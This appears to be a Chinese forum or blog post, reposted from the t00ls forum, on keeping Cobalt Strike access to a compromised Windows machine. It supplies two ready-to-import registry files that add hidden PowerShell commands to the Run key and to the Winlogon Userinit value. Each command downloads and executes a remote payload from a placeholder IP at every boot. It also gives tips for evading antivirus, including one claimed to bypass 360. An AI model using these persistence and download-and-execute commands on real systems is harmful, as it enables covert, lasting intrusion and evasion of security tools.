cobalt strike维持权限-无文件自启动还免杀

首发在t00ls论坛
https://www.t00ls.net/thread-50643-1-1.html


Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"cs"="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://ip:端口/a'))\""

把上面保存为1.reg
cmd下执行
regedit /s C:/1.reg
导入注册表。

在windows启动项注册表里面加一个powershell自启动,这个自启动是带参数的自启动,就是powershell自启动并执行了后门的命令

其中

powershell.exe -nop -w hidden -noexit -c "IEX ((new-object net.webclient).downloadstring('http://ip:端口/a'))"

是cs的powershell下载执行

这样每次目标机器重启都会下载并执行我们的shellcode了

延伸:
上面的重点不是加注册表,而是注册表自启动的exe文件后面可以带命令

那么如果要躲避杀软,其实可以通过两个方面来改良
1,把文件不要下载,直接执行shellcode
2,把自启动写在别的检查不严格的位置

可以自行google 搜索 regedit autorun去学习下哪些注册表的建值可以自启动

下面一个过360的例子

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]

"Userinit"="C:\\Windows\\system32\\userinit.exe,C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://ip:80/a'))\""

Jietu20190409-020616.jpg

发表新评论